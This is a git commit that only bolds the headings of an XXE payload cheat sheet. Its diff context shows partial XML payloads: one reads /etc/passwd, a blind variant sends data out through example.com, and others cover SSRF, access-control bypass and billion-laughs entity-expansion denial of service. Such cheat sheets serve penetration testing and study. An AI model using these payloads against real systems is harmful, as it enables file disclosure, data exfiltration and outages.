Make bold headings

2024-11-22 02:53:06 +00:00 · 2017-09-28 17:39:50 +03:00 · 2017-09-28 17:39:50 +03:00 · 793328b4cf
commit 793328b4cf
parent 9a07dd802e
1 changed files with 6 additions and 6 deletions
--- a/cheatsheets/xxe.md
+++ b/cheatsheets/xxe.md
@ -1,4 +1,4 @@
-LFI Test
+**LFI Test**
 ```
 <?xml version="1.0"?>
 <!DOCTYPE foo [  
@ -6,7 +6,7 @@ LFI Test
 <!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
 ```

-Blind LFI test (when first case doesn't return anything)
+**Blind LFI test (when first case doesn't return anything)**
 ```
 <?xml version="1.0"?>
 <!DOCTYPE foo [
@ -15,7 +15,7 @@ Blind LFI test (when first case doesn't return anything)
 <!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
 ```

-Access Control bypass (loading restricted resources - PHP example)
+**Access Control bypass (loading restricted resources - PHP example)**
 ```
 <?xml version="1.0"?>
 <!DOCTYPE foo [
@ -23,7 +23,7 @@ Access Control bypass (loading restricted resources - PHP example)
 <foo><result>&ac;</result></foo>
 ```

-SSRF Test
+**SSRF Test**
 ```
 <?xml version="1.0"?>
 <!DOCTYPE foo [  
@ -31,7 +31,7 @@ SSRF Test
 <!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
 ```

-XEE (XML Entity Expansion - DOS)
+**XEE (XML Entity Expansion - DOS)**
 ```
 <?xml version="1.0"?>
 <!DOCTYPE lolz [
@ -50,7 +50,7 @@ XEE (XML Entity Expansion - DOS)
 <lolz>&lol9;</lolz>
 ```

-XEE #2 (Remote attack - through external xml inclusion)
+**XEE #2 (Remote attack - through external xml inclusion)**
 ```
 <?xml version="1.0"?>
 <!DOCTYPE lolz [